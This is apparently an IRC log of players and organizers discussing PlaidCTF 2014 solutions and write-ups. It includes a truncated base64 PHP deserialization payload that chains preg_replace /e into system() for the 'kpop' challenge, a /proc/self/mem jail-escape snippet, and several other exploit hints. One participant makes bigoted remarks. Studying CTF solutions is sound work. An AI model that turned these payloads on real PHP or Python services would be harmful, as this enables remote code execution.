21:08 #pctf: < iago-x86> I just sucked. :)
21:08 #pctf: < D3AdCa7> how to solve web800 stage1.....
21:08 #pctf: < wtbw> because I'm sure it could e done much faster
21:08 #pctf: < wtbw> *be
21:08 #pctf: <+awesie> btw, i will post a blog post about the website issues and how we resolved them at some point
21:08 #pctf: < dkohlbre> choppers: literally did that and forgot it gets run
21:08 #pctf: < KT> what was the solution of "parlor"?
21:08 #pctf: < abuss> tomcr00se, dns magic?
21:08 #pctf: <@mserrano> did anyone like tiffany?
21:08 -!- shabgrd [~mostafa@unaffiliated/shabgard] has joined #pctf
21:08 #pctf: <@mserrano> tiffany was my favorite
21:08 #pctf: < iago-x86> awesie: That's awesome! Make sure you cc: shmoocon :)
21:08 #pctf: < choppers> dkohlbre: if you name your pokemon /bin/sh you get system("/bin/sh")
21:08 #pctf: < [CISSP]HoLyVieR> tomcr00se: What SQLi did you use for WhatApp, the only table I could leak with 64 characters was comments ?
21:08 #pctf: < tomcr00se> awesie: harry_potter after you have rop?
21:08 #pctf: < keidii> anyone solve BBOS here ??
21:08 #pctf: < Ymgve> KT: server lies, nonce is used repeatedly, so hash extension
21:08 #pctf: <+tylerni7> <3 awesie and cai_ for making the site work
21:08 #pctf: < zoku> mserrano: tiffany was fucked
21:08 #pctf: < zoku> mserrano: did you write that too?
21:08 #pctf: <@mserrano> yes
21:09 #pctf: < tomcr00se> [CISSP]HoLyVieR: i guessed (select * from flag) :P
21:09 #pctf: < okami41> mserrano: tiffany was a lot of fun, it took me forever though!
21:09 #pctf: < ryan-c> https://gist.github.com/anonymous/10602398#file-pctf2014-rsa450 < rsa writeup
21:09 #pctf: < [int3]romansoft> <sven> heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D -> wtf!!! How did you find key.xor_encrypted amd xor_key contents? Offsets of them?
21:09 #pctf: < wtbw> mserrano: well I said "what about 'breakfast at tiffany's'?"
21:09 #pctf: < mak`> what was correct solution to zfs?
21:09 #pctf: <+awesie> tomcr00se: you should've been able to just use system(...) to run commands
21:09 #pctf: < ryan-c> tylerni7: ^^^
21:09 #pctf: < Ymgve> keidii: SHA1 hashes of device password in nvram
21:09 #pctf: < okami41> i kept wanting to set breakpoints
21:09 #pctf: < mak`> without brute?
21:09 #pctf: <@mserrano> I wrote ezhp, tiffany, mtpox, kpop, hudak, moscow, wheee, twenty, mult. is hard
21:09 #pctf: < keidii> Ymgve , och
21:09 #pctf: < spq> hy, thanks for the nice ctf
21:09 #pctf: < [CISSP]HoLyVieR> tomcr00se: oh wow ... :/
21:09 #pctf: < tomcr00se> awesie: but how to find libc?
21:09 #pctf: < dkohlbre> choppers: yeah I had that, godammit I was so tired and looking for a write, somehow ignored I was writing a function pointer that i knew
21:09 #pctf: < upb> grrrrr wtf
21:09 #pctf: < bool101> wow mserrano nice
21:09 #pctf: < dkohlbre> choppers: ah well ty
21:09 #pctf: <+awesie> tomcr00se: you could leak libc address
21:09 #pctf: < tomcr00se> before socket shutdown?
21:09 #pctf: < iago-x86> mserrano: I solved ezhp, mtpox, and kpop :)
21:09 #pctf: < ryan-c> tomcr00se: did you write an attack for rsa from scratch or use the c poc by the people that wrote that paper?
21:10 #pctf: < tomcr00se> i could either leak libc address OR use libc address
21:10 #pctf: < Ymgve> mserrano: was there some agreement to use city names for VM tasks? :)
21:10 #pctf: < bool101> liked that problem awesie
21:10 #pctf: <+awesie> tomcr00se: don't shutdown the socket, you could get the argument to new() to be -1
21:10 #pctf: < rray> iago-x86: how did you solve kpop? wob was too hard
21:10 #pctf: < tomcr00se> ryan-c: lol poc of course
21:10 #pctf: < zoku> iago-x86: what was your ezhp solution?
21:10 #pctf: <@mserrano> Ymgve: I named both of them :P
21:10 #pctf: < foundation> do you guys know who runs chandler tor node ?
21:10 #pctf: <+awesie> tomcr00se: if you have a string of the form: AAAA...PASSWORD
21:10 #pctf: < Ymgve> paris was nasty
21:10 #pctf: <+houqp_> foundation: yeah
21:10 #pctf: < abuss> How did nightmare work? I did try read/write to /proc/self/mem but it gave me i/o error
21:10 #pctf: <@mserrano> paris was a great problem
21:10 #pctf: < iago-x86> rray: kpop = take advantage of preg_replace()'s /e extension
21:10 #pctf: < foundation> he's gonna be scratching his head over this weekend i guess :)
21:10 #pctf: < tomcr00se> awesie: ahh, i missed that, and new will throw
21:10 #pctf: <+houqp_> foundation: we contacted the operator before hand :)
21:10 #pctf: <+awesie> tomcr00se: yep
21:10 #pctf: < wtbw> I really liked that Paris was "clean", other than SEH usage
21:10 #pctf: < foundation> houqp_: cool
21:10 #pctf: < wtbw> no bs, just complication
21:10 #pctf: <+awesie> w/in 7
21:10 #pctf: < blagh> how did mtpox work? I never managed to pull it off
21:10 #pctf: <+awesie> ugh
21:10 #pctf: < rray> iago-x86: i was trying to exploit that at one point, but i couldn't control what went into preg_replace
21:10 #pctf: < iago-x86> zoku: It was basically owning a linked list, I think?
21:11 #pctf: < rray> i guess i'll wait for the writeup
21:11 #pctf: < spq> abuss: i made it with python bytecode to x86 shellcode
21:11 #pctf: <+houqp_> foundation: they were very happy with that :)
21:11 #pctf: <@mserrano> blagh: hash extension -> sql injection
21:11 #pctf: < ryan-c> tomcr00se: it took a while for me to think to look for a poc, people who write papers rarely release code
21:11 #pctf: < iago-x86> rray: You can control it via deserializing $_COOKIE['lyrics']
21:11 #pctf: < rray> 0_0
21:11 #pctf: < KT> <Ymgve>: but you dont know the highest 28 bits of the hash, so how do you extend it?
21:11 -!- jn__ [bert@bitcoinshell.mooo.com] has joined #pctf
21:11 #pctf: <@mserrano> rray: look up stefan esser's slides on POP chains
21:11 #pctf: < Ymgve> KT: brute force
21:11 #pctf: < ryan-c> anyone else here get parlor?
21:11 #pctf: < rray> ... i did that, but i did it wrong haha
21:11 #pctf: < iago-x86> Haha
21:11 #pctf: < iago-x86> I actually used a whiteboard to draw the object structure
21:11 #pctf: < KT> Ymgve: ok, true, nice :D
21:11 #pctf: < iago-x86> Good times
21:11 #pctf: * iago-x86 signs off
21:11 #pctf: < Ymgve> KT: do two guesses in sequence then use brute force locally to find the remaining bits
21:11 #pctf: < iago-x86> (metaphorically)
21:11 #pctf: <@mserrano> Tzo2OiJMeXJpY3MiOjI6e3M6OToiACoAbHlyaWNzIjtzOjQ6ImFzZGYiO3M6NzoiACoAc29uZyI7Tzo0OiJTb25nIjo0OntzOjk6IgAqAGxvZ2dlciI7Tzo2OiJMb2dnZXIiOjE6e3M6MTI6IgAqAGxvZ3dyaXRlciI7TzoxNDoiTG9nV3JpdGVyX0ZpbGUiOjI6e3M6MTE6IgAqAGZpbGVuYW1lIjtzOjg6InNvbWVzaGl0IjtzOjk6IgAqAGZvcm1hdCI7TzoxMzoiTG9nRmlsZUZvcm1hdCI6Mjp7czoxMDoiACoAZmlsdGVycyI7YToxOntpOjA7TzoxMjoiT3V0cHV0RmlsdGVyIjoyOntzOjE1OiIAKgBtYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNDoiACoAcmVwbGFjZW1lbnQiO3M6MzU6InN5c3RlbSg
21:11 #pctf: < rray> mserrano: i was looking at the article he wrote, in retrospect i was actually quite close :P
21:11 #pctf: < abuss> spq, nice, got a writeup? I tried to build bytecode that would call os.system but I couldn't get import to work
21:12 #pctf: <@mserrano> importing that
21:12 #pctf: <@mserrano> oh shit that got truncated
21:12 #pctf: <@mserrano> oh well
21:12 #pctf: <@mserrano> would get flag
21:12 #pctf: < whois> who know bbos ?
21:12 #pctf: < deject3d_> where writeups
21:12 #pctf: < foundation> was there an easy way of solving g++ , those c++ templates ?
21:12 #pctf: < abuss> ryan-c, curious how? I spent an hour or so on that but couldn't find any way to predict output
21:12 #pctf: <@mserrano> http://paste2.org/Nn46z87k <- import this on kpop, obtain flag
21:12 #pctf: < zoku> iago-x86: yea, had to overflow one buffer to write to the linked list
21:12 #pctf: < spq> abuss: i'll see
21:12 #pctf: < Ymgve> whois: SHA1 hashes of device password in nvram
21:12 #pctf: < abuss> it wasn't a lcg as far as I could tell
21:12 #pctf: < tomcr00se> foundation: dynamically
21:12 #pctf: < comex> foundation: i tried z3 but it didn't work :p
21:12 #pctf: < ryan-c> abuss: hash length extension attack
21:12 #pctf: < blagh> mserrano: Well, I was going down a completely wrong path
21:12 #pctf: < whois> Ymgve // Thx, !
21:12 #pctf: < abuss> god dammit I really need to figure out how those work
21:12 #pctf: < abuss> haha
21:12 #pctf: < ryan-c> abuss: you can get the last 100 bits of the md5
21:13 #pctf: < yyyyyyy> sooooo..... guys.... anyone solved the almost-feistel cipher?
21:13 #pctf: < ryan-c> abuss: extend it blind
21:13 #pctf: < zardus> great ctf, guys
21:13 #pctf: < marcoscars02> ryan-c, awesome write
21:13 #pctf: <@mserrano> yyyyyyy: :)
21:13 #pctf: <+tylerni7> btw, who solved RSA? curious how you did it?
21:13 #pctf: <@mserrano> yyyyyyy: Slide attack
21:13 #pctf: < NK_> never saw a ctftime update as quickly
21:13 #pctf: < NK_> :)
21:13 #pctf: < foundation> tomcr00se: dynamically ? i tried to mess with recursion depth , to figure out something ...
21:13 #pctf: <+tylerni7> apparently there was code posted :(
21:13 #pctf: < zardus> my favorite was harry potter :-)
21:13 #pctf: < [int3]romansoft> please, offsets of key.xor_encrypted and xor_key (zfs)???
21:13 #pctf: <@mserrano> yyyyyyy: you can reverse a single double-round in <= 4096 iterations
21:13 #pctf: <+tylerni7> I wanted people to solve themselves
21:13 #pctf: < tomcr00se> tylerni7: the code from the paper
21:13 #pctf: < ryan-c> abuss: and brute force the other 28 bits to find something that resulted in a matching second hash
21:13 #pctf: < abuss> tylerni7, kmowery
21:13 #pctf: <+tylerni7> tomcr00se: damn
21:13 #pctf: <@mserrano> yyyyyyy: and then using ~512 plaintexts you can reliably get a slid pair
21:13 #pctf: <+tylerni7> tomcr00se: I didn't know about the code D:
21:13 #pctf: <+tylerni7> someone else linked me to it
21:13 #pctf: < abuss> nice okay
21:13 #pctf: < ryan-c> marcoscars02: It's a quick shitty writeup, lol will make a better one later
21:13 #pctf: < tomcr00se> tylerni7: wait you really wrote that attack?
21:13 #pctf: < fuzyll> tylerni7: tomcr00se: what paper?
21:13 #pctf: <@mserrano> tomcr00se: yeah, he did
21:13 #pctf: <+tylerni7> tomcr00se: yeah I have it in python
21:13 #pctf: <@mserrano> it's pretty cool
21:14 #pctf: < marcoscars02> awesome code ryan-c
21:14 #pctf: < marcoscars02> :O
21:14 #pctf: < sven> i think segher wrote his own code too after reading the paper
21:14 #pctf: < ryan-c> fuzyll: http://cseweb.ucsd.edu/~hovav/papers/hs09.html
21:14 #pctf: < geobot> yeah ucsd revealed themselves
21:14 #pctf: <+tylerni7> sven: :) good
21:14 #pctf: < sven> not sure though :)
21:14 #pctf: <+tylerni7> geobot: yes.. they did
21:14 #pctf: <@mserrano> sven: how did DS get wheee?
yyyyyyy> mserrano, I actually didn't know that attack... :/ thanks for explaining
<mserrano> sven: did you guys actually do the 26**3 requests?
<@ryan-c> I got part way through writing my own code from the paper too
abuss> tylerni7, the best part is that our crypto guy didn't see that link
<tomcr00se> what was the wheee solution?
abuss> and spent quite a while writing from scratch
<mak`> zfs anyone? ;]
<mserrano> tomcr00se: http://www.theamazingking.com/crypto-slide.php
<@abuss> and then noticed it after submitting flag :P
dkohlbre> tylerni7: the best part is that he IS HOVAV'S GRAD STUDENT
<abuss> ^^^^
<sven> mserrano: uh.. i know that someone implemented the slide attack, dunno how many requests we sent though
mserrano> sven: ah cool
mserrano> someone was gonna do 26**3 blocks
<@sven> :D
<ryan-c> abuss: he wrote a solver from the paper then found the source?
<mserrano> but you can do it in < 512; I got it with 256
<@tylerni7> dkohlbre: haha whatt
<+mserrano> (aka a single request)
<@tomcr00se> grr, yea, i figured it was something like this, but i was too tired this morning
<whois> whats tor(rendezvous) prob?
<tylerni7> that's great
<+sssssssss> how to solve halphow2js?
<dkohlbre> tylerni7: yeah, he grabbed the paper, wrote a new impl, and THEN noticed the impl by hovav
<mserrano> dkohlbre: LOL
<@tylerni7> dkohlbre: that makes me so happy
dkohlbre> sooo now we have 2
<clockish> :D
<tylerni7> lol
<+asmoday> HEY whats the next CTF
<mathiasbynens> halphow2js write-up https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js
<whois> using chandler router to connect onion ?
<marcoscars02> asmoday, sqli
<tylerni7> asmoday: ctftime.org
<+marcoscars02> xD
<asmoday> so that site is up to date
<mathiasbynens> heartbleed write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/heartbleed
<tylerni7> yeah
<+Ymgve> How do you specify a router to use as a rendezvous point?
<wtbw> thanks again guys :)
<foundation> whois: yes, you had to patch the tor source to make sure it uses chandler as rendezvous point
<ryan-c> whois: you have to modify tor in a couple places - first to handle an unencrypted list of intro points, then to force using chandler as a rend point, then to include beef in the rend cookie
<mathiasbynens> multiplication is hard write-up: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/multiplication-is-hard
<ryan-c> Ymgve: you have to modify the tor source code
<asmoday> multiplication is hard, oh the memories
<foundation> Ymgve: source patching
<Ymgve> ryan-c: was afraid of that
<whois> oh ,,
<== wtbw [~wtbw@unaffiliated/wtbw] has quit []
jix> ryan-c: unencrypted list of intro points?
<ryan-c> it was a pain in the arse
<jix> ryan-c: I didn't have to do that
<== oceanx_ [~oceanx@] has quit [Ping timeout: 276 seconds]
pipecork> mathiasbynens: lol
<ryan-c> jix: hm
<jix> only chandler as rend point and beef as cookie
<mathiasbynens> pipecork: the real tough ones :')
<jix> but it was painful
<mathiasbynens> please add links to your write-ups here https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014
<jix> especially chandler as rend point
<abuss> oh my god that jshalp
<abuss> 0.0
tomcr00se> i loved jshalp
<dkohlbre> ok time to go home, ty ppp
<sven> freya annoyed me the most. especially 'cause all i did was recompile openssh in the end to make it work :<
<awesie> dkohlbre: thanks for playing :)
<+sdjakl> re wheeeee, i wrote the slide attack. we used 256 blocks
<sdjakl> (for whoever was asking sven)
<mathiasbynens> tomcr00se: did you solve it the same way? https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
<clockish> abuss: do you know how to js
<abuss> clockish, so what did mystop do? I spent HOURS trying to reverse and black box it
<sven> mserrano: ^--
<ryan-c> anyone do a writeup of curlcore?
<abuss> clockish, LOLNO
<clockish> abuss: i don't either
abuss> it was like the collatz function
<abuss> but with an exception
<mserrano> tomcr00se: anyone else wondering: https://gist.github.com/mserrano/54465a80ffe75739d2ee
<@abuss> that had an exception
<tylerni7> ryan-c: use something to search for aes key schedule
<+mserrano> sven: sdjakl: cool
<@mathiasbynens> clockish, abuss: https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/halphow2js#readme
<tylerni7> then cbc
<+tylerni7> :P
<+ryan-c> tylerni7: goddamnit
<ryan-c> really?
<clockish> abuss: yeah, exactly. I just modified the collatz function with some shit
<ryan-c> I threw aeskeyfind at it first thing
<mserrano> (that gist uses 512 blocks, but you can use 256 and it will work with very high probability)
<@ryan-c> and got an aes key
<geobot> ah, thought it will win 8 to search for aes key schedule
<mserrano> (csol is just a C implementation of the cipher)
<@tylerni7> ryan-c: yeah, aeskeyfind may not work, but some tools do
<+tomcr00se> too tired to even read that :P
<marcoscars02> steg writeup?
<marcoscars02> :DD
<Pitr_> why was the memory layout in curlcores dump different from gnutls_int.h ?
<clockish> mathiasbynens: yeah, good write up, that's basically the intended solution :)
<sdjakl> a
<tylerni7> marcoscars02: randomize the palette
<+ryan-c> aeskeyfind gave me 68f946e9c1fd339eec04fc048e651ba7642ee8df2519aaf308ab567f7e4bc231
<tylerni7> then reopen image
<+tylerni7> ryan-c: there are 2 keys
<+ryan-c> next to some asn1 structures
<Beched> lol people say that penthackon team cheats like ASSholes asking ppl for hints or flags, pretending they are some poor small team in the bottom of scoreboard. And they post FAKE flags in PM LOL
<tylerni7> one for encrypting, one for decrypting
<+tylerni7> (each side of the connection)
<+_blasty_> LOL Beched
<sven> :D
<ryan-c> tylerni7: you mean one for server->client and one for client->server?
<== Valion [~Valion@c-75-70-225-60.hsd1.co.comcast.net] has joined #pctf
rray> thx ppp, it was a cool ctf
<Ymgve> I think Beched got burned
<tylerni7> ryan-c: yep
<+arthurdent> tylerni7: how do you randomize the palette?
<mserrano> rray: :)
<@Beched> Ymgve: ??
<tylerni7> arthurdent: open it up in something like 010
<+abuss> yeah, great problems! can't wait until I can do more than 10% of them :P
<tomcr00se> mathiasbynens: sort of, i did "+6"
<Adran> marcoscars02: Have you played with StegSolver? :)
<marcoscars02> zsteg
<marcoscars02> :S
<== yyyyyyy [~yyyyyyy@] has left #pctf []
marcoscars02> and a lot of brain xDD
<sdjakl> l/win 18
keidii> any ZFS solution other than brute ?
<== D3AdCa7_ [d220a27e@gateway/web/freenode/ip.] has joined #pctf
tylerni7> keidii: yes... but it was a pain
<+ryan-c> for steg, we just dicked around with setting all colors in the palette except one to black
ryan-c> and found an interesting range of palette entries
<inter> tylerni7: do you know who made tenement?
<mak`> tylerni7: tell me
<keidii> tylerni7 , i dropped reading zfs src/doc after few hours
<tylerni7> inter: gbarboza
<+mak`> i spend a lot h on this
<== Rexperience7 [~Rex@unaffiliated/rexperience7] has joined #pctf
mak`> and got nothing at the end
Adran> i just randomized the colors and was able to make out all but the 'keep' part originally
<pd7> what tool did you use to randomize the colors?
<Adran> stegsolve
<mak`> how one can find file if there is no data in dnode table?
<pd7> thanks
<ciliated> how to solve kpop?
<mak`> ciliated: unserialize and preg_replace
<Adran> ciliated: http://paste2.org/Nn46z87k
<abuss> anyone got a nightmare writeup?
<mathiasbynens> clockish: nice! there must be a better way to find input groups for halphow2js rather than trial and error though
<abuss> I heard you were supposed to write to /proc/self/mem but I got i/o err
<clockish> abuss: write to /proc/self/mem
<clockish> oh
clockish> you have to write correctly
<clockish> like, turn off buffering
<abuss> oh hmm
Ymgve> what was the solution to freya?
<mibbit_19028> solution to pwn 100?
<clockish> mathiasbynens: heh, not really, just once you realize you can do it with small numbers you just play around
<robbje> mak`: same here :>
<Pitr_> tyler, what did i miss on curlcore?
<inter> mserrano
<inter> how did i
<inter> misread
<ryan-c> tylerni7: How's the reading interface on parlor built? Is it basically dependent on the nonce being in a single packet?
<inter> 1 with l
<mak`> robbje: you did it?
<mathiasbynens> clockish: ok cool, thanks for confirming
<inter> i still cant believe it
<tylerni7> ryan-c: dude I dunno
<+tylerni7> it's just simple python
<+tylerni7> I wrote it as simply as possible :P
<+robbje> mak`: no :(
<foundation> Pitr_: what did you do on curlcore ?
<mak`> tylerni7:
Rexperience7> how to solve tenement
<mserrano> inter: :
<@robbje> i just wasted hours on it
<mserrano> (
<@ryan-c> tylerni7: You're just doing a socket read?
<Pitr_> why was the memory layout in curlcores dump different from gnutls_int.h
<robbje> Rexperience7: google egghunter
tylerni7> ryan-c: yeah
<+Sin__> Rexperience7, just dump the whole memory and do strings
<gbarboza> Rexperience7: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
<+foundation> i dumped the heap and searched for something resembling the client random , first part you can take from ssl packet
<tylerni7> if it's multiple packets it might get sad (as in it'd just read the first one)
<+Rexperience7> oh
<Rexperience7> EGGHUNTER
<[pwn]Idolf> FUCKING HELL
<Rexperience7> OHHHHHHH
<dickoff> Streaming question, do people care about the video part of plaidTV or just the music
<+[pwn]Idolf> We got code exec on the python jail now
<[pwn]Idolf> 28 minutes too late
<inter> dickoff: you should stream
<Pitr_> foundation: i checked the order in the header file
<inter> of you guys
<Sin__> what plaidtv ?
<[pwn]Idolf> what was the intended solution?
<inter> suffering from 502 errors
<mathiasbynens> [pwn]Idolf: what’s your exploit look like?
<ryan-c> tylerni7: yeah, it didn't work when i tried to send stuff through netcat which breaks into packets by line.
<mak`> dickoff: both
<ricky> Sin__: It's a video/audio stream dickoff did last year
<+mserrano> [pwn]Idolf: use /proc/self/mem to overwrite a function pointer
<@robbje> mserrano: i think we solved it differently :)
<muchacho> mserrano, how do you call "someshit"-file ?
<ryan-c> tylerni7: worked when i used python and socket.sent
<ryan-c> er
<Sin__> like at the defcon quals? that would've been nice
<ryan-c> send
<tylerni7> ryan-c: yeah
<+mserrano> robbje: did you guys use a code object?
<@sven> so, i'm curious, how was zfs supposed to be solved?
<[pwn]Idolf> mserrano: wtf, can you write using /proc/self/mem?
<[pwn]Idolf> We tried that :/
<tylerni7> sven: zfs stuff...
<+robbje> mserrano: i think so
<robbje> the exploit is huge and ugly :>
<geobot> its ugly though
<abuss> dickoff, did I miss a link to plaidtv?
<tylerni7> sven: frozencemetery and awreece know how
<+mserrano> [pwn]Idolf: yeah, you have to set the modes correctly and shit
<@ryan-c> also fuck debugging endianness issues
<abuss> 48 hours ago? :P
<mserrano> robbje: :) that's how clockish did it
<@dickoff> abuss: I didn't do it this year
<+abuss> ah k
<[pwn]Idolf> mserrano: ..... open("/proc/self/exe", "w")?
<== nUl1 [5d9dadb6@gateway/web/freenode/ip.] has quit [Quit: Page closed]
mserrano> open("/proc/self/maps", "r+b")
<@clockish> robbje: you used a code object? <3
<mserrano> you also have to set buffering to zero or something
<@robbje> clockish: spq did it, yeah
<abuss> ahhh
<[pwn]Idolf> mserrano: what-the-shit.... that's not at ALL how we solved it :D
clockish> [pwn]Idolf: what did you do?
<[pwn]Idolf> mserrano: I'm considering sharing the exploit, but that would ruin a CTF-problem I'm designing :P
<geobot> priv escalation vulnerabilities ruin it all
mserrano> [pwn]Idolf: lol
<@tylerni7> [pwn]Idolf: awww
<+mserrano> I thought we would finally kill python jails
<@abuss> I was reading all the /proc/self/ stuff but only tried to write to mem
<tylerni7> [pwn]Idolf: just share it with us then ;)
<+mserrano> with last year and this year
<@dickoff> inter: mak` I'll bring it back in some fashion next year
dickoff> doing videos is way more annoying than music
<+[pwn]Idolf> mserrano: well, I guess your solution is more general... but WHAT IF WE DIDN'T EVEN HAVE STDOUT?!? :D
<muchacho> mserrano, how do you call "someshit"-file in kpop? What is the path?
<Pitr_> we need more perl chals
mserrano> muchacho: you don't need to call a file
tylerni7> Pitr_: that can be arranged
<+sven> i want more non-x86 pwnables
<clockish> [pwn]Idolf: I for one am super curious what you did :)
<robbje> ban Pitr_
<asmoday> IPV6
<Tapyroe__> any one want to briefly tell me how to solve mt pox? XD
<robbje> :>
<mserrano> muchacho: in fact it doesn't successfully write to that file
<@tylerni7> sven: we'll see... that requires not EC2 for hosting
<+Pitr_> great!
<abuss> oh I also wanted to say that I liked reekeeee
<jix> or non x86 reversing
<sven> tylerni7: qemu on ec2 should work :)
<abuss> it felt like a really solid web problem
<mserrano> muchacho: instead it uses preg_replace("/stuff/e", "phpcode()")
<@clockish> [pwn]Idolf: Given that I wrote the chall and couldn't find any other holes...
<tylerni7> sven: well.. qemu isn't the best
* Pitr_ kicks robbje in the balls :D
<Sin__> Tapyroe__, hash length extension
<hammerpig> many thanks for ctf
sven> tylerni7: ah, fair enough. it probably requires quite some cpu power if all people are trying to pwn it at the same time
<mibbit_19028> tiffany was a pain all that antidebugging!
<== alex___ [b2c22e8b@gateway/web/freenode/ip.] has joined #pctf
tylerni7> also annoying qemu bugs sometimes crop up
<+[pwn]Idolf> clockish: ok, sure... I'll upload it not
<muchacho> mserrano, ah k damnit, thx!
<Tapyroe__> Sin__: thanks!
<[pwn]Idolf> clockish: https://gist.github.com/anonymous/dff51e9ec27deb828e1d
<Pitr_> & thanks again, see you next year!
<mserrano> [pwn]Idolf: ok, so you used a code object
<@mserrano> ok
<@inter> tylerni7 so what was the solution to rsa?
<clockish> [pwn]Idolf: oh, a code object. Yeah, that was another way to do it.
<inter> i had a chunk of code for it
<inter> but didnt work
<mserrano> inter: there's a paper
<@mserrano> they have a description of an algorithm
<@clockish> [pwn]Idolf: good work!
<mserrano> either find an implementation or write one
<@mserrano> obtain flag
<@tylerni7> inter: well... I wrote code from scratch... there is source that mostly works online though :(
<+tylerni7> that I didn't know about (:
<+inter> r
<inter> o
<inter> f
<tylerni7> :(*
<== makler2004 [~chatzilla@adhg69.neoplus.adsl.tpnet.pl] has quit [Quit: ChatZilla [Firefox 28.0/20140314220517]]
inter> aint nobody got time fo dat
<inter> jk
<inter> i sometimes wish i was black female
<inter> so i can say that
<inter> no racism
<== Zibro [~zibro@tu132135.ip.tsinghua.edu.cn] has joined #pctf
clockish> [pwn]Idolf: code obj is the more leet way to do it :)
<[pwn]Idolf> clockish: /proc/self/mem was one of the first things I tried :/
<clockish> [pwn]Idolf: yeah, I thought more people would use proc/self/mem because it is easier.
<inter> clockish: your challs require too much creativity
<clockish> inter: :D
<inter> its too much for non-cs major kid
<inter> :/
<== Hertle [~Hertle@host74-2.natpool.mwn.de] has quit [Ping timeout: 245 seconds]
clockish> [pwn]Idolf: yeah, you need f = file('/proc/self/mem', 'r+b', 0); f.seek(i); x=f.read(l) to make it work
<abuss> 0 for unbuffered?
<clockish> abuss: yes
<[pwn]Idolf> clockish: when it didn't work initially, I found somewhere on the web that said you apparently couldn't do it :/
<jjk_> to the zfs - i constructed a new uberblock pointing to newer blocks and used ufs explorer to extract the data (as it ignores the checksums)
<mserrano> it depends on your system :(
<@clockish> [pwn]Idolf: :/
<[pwn]Idolf> I tried "rwb"
<mserrano> jjk_: that was the intended solution :)
<@dickoff> so how big of a party is 0xffa throwing?! _blasty_, ius, iZsh, etc
<+== mibbit_19028 [4a780f96@gateway/web/cgi-irc/kiwiirc.com/ip.] has quit [Quit: mibbit_19028]
clockish> [pwn]Idolf: yeah, it works on every machine I've tried it on, except for mserrano's :P
<== random_user_23 [5d6846fd@gateway/web/freenode/ip.] has quit [Quit: Page closed]
mserrano> yeah it fails on my droplet
<@[int3]romansoft> jjk_: can you elaborate on that? (zfs)
<== mode/#pctf [+v clockish] by mserrano
== mode/#pctf [-o mserrano] by mserrano
jjk_> mserrano: it took me a while to notice the uber-corruption in challenge description :)
<== Pause [~PauseSave@ip68-98-14-13.ph.ph.cox.net] has quit []
mak`> jjk_: im zfs n00b could you elaborate?
<poppopret> anyone got a g++ writeup?
<tylerni7> poppopret: well
<+cai_> thanks for leaving feedback. they greatly help us to improve pctf every year :)
<+tylerni7> basically it does matrix multiplication on your key over gf(257)
<+cai_> if you haven't done it yet, please take our survey: http://bit.ly/1ifQBOo
<+dickoff> ^^^
<+mak`> i was trying to find metadata like here: http://www.joyent.com/blog/zfs-forensics-recovering-files-from-a-destroyed-zpool
<tylerni7> poppopret: not quite a writeup, but yeah that's how it verified your key
<+inter> anyways
<mak`> but find only zap with file names and id
<inter> i has my writeup in very very short point form
<mak`> and there was no data in dnode tables
<mak`> at this id
<jjk_> i can recommend ondiskformat.pdf for zfs structure
<poppopret> ahhh
<poppopret> ok
<inter> gg is gay
<poppopret> thanks tyler
<== sibios [~sibios@unaffiliated/sibios] has quit [Quit: Leaving]
<+tylerni7> poppopret: I'm sure someone will post a better writeup for it
<+mak`> yeah was reading it
<== c1l0 [~c1l0@c-98-248-187-55.hsd1.ca.comcast.net] has joined #pctf
irctc736> anyone has a writeup on bronies?
<foundation> tylerni7: please tell me you didn't write that by hand
<Sin__> clockish, was there a better way ?
<tylerni7> foundation: I... did
<+== AnthraX101 [~asdf@23-25-135-9.seattle.securityinnovation.com] has quit []
tylerni7> iteratively, but by hand
<+inter> clockish: yep 4 bytes a type
<cai_> we'll soon make a page that lists all the write-ups submitted to us (via email or dropped in IRC)
<+clockish> Sin__: for g++? yeah, read the code and understand that it's GF(207)
<+clockish> But math is hard.
<+jjk_> mak`, [int3]romansoft and here is my ugly python code to find uberblocks - http://pastebin.com/Y14B2RAh
<inter> pos 0,4,8,12
<Sin__> it is
<inter> but then
<jmgrosen> so, how do you do bronies part 1? that's been bothering me
<poppopret> where do we submit writeups to?
<inter> i misread
<inter> 1 as l
<inter> or
<sven> "see suspicious file name, figure out it's two files XOR'ed together, find out a suspicious block just before the file name, xor that with whole file, strings. profit"<-- how aDR4eA solved zfs :)
<inter> l as 1
<inter> and lost the breakthru
<inter> fuckkk
<clockish> Sin__: So i'd say brute force is actually the better solution :P
<+jjk_> and the missing blocks
<abuss> cai_, fixed mine: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
<shabgrd> I think half the world solved crypto 20 except for me :(
<[int3]romansoft> cai_: for next year, a simple board that lets us read the problems and send the flags. No more is needed.
<geobot> oo i like skier_ too late to make friends at the ai is littered with you have a lot of simple binaries(no arm, x86-32)
<poppopret> where do we submit writeups to?
<tylerni7> [int3]romansoft: it's what happens when we try to innovate :(
<+abuss> Hmm I liked the fancy board and the voting mechanics
<clockish> poppopret: nothing PPP official, but there's a CTFs writeups github that aggregates writeups
<+poppopret> ok
<[pwn]Idolf> clockish: the main reason our exploit didn't work? We had a '|' instead of a 'd'
<phiber__> innovating is fine, but please have a fallback simple interface
<abuss> it worked surprisingly well across my devices
<cai_> [int3]romansoft: you might actually get that. i'm quitting after this one is wrapped up.
<+mserrano> [pwn]Idolf: awwwwww
<+tylerni7> poppopret: if you put them in here we'll try to keep up with them
<+== alex___ [b2c22e8b@gateway/web/freenode/ip.] has quit [Ping timeout: 240 seconds]
[pwn]Idolf> mserrano: ok, I'll stop whining now and go to bed :P
<tylerni7> cai_: <3
<+tylerni7> :(
<+phiber__> I didn't know you could switch the board to see more problems until 8h passed
tylerni7> upb: yeah, standard for django
<+upb> ah
<tylerni7> maybe more as well
<+abuss> upb, I had just spent a while on reekeee
<abuss> which was very similar
<phiber__> the mouse cursor doesn't change when hovering over any clickable thing
<deject3d> what was the solution to reekee anyway
<jmgrosen> anyone have a writeup of part 1 of bronies up yet?
<deject3d> or at least where was the flag
<iago-x86> I just realized I haven't eaten today :)
<Dumpling> https://github.com/isislab/CTF-Solutions/tree/master/PCTF_2014 <- solutions for mtpox, kpop, and kappa
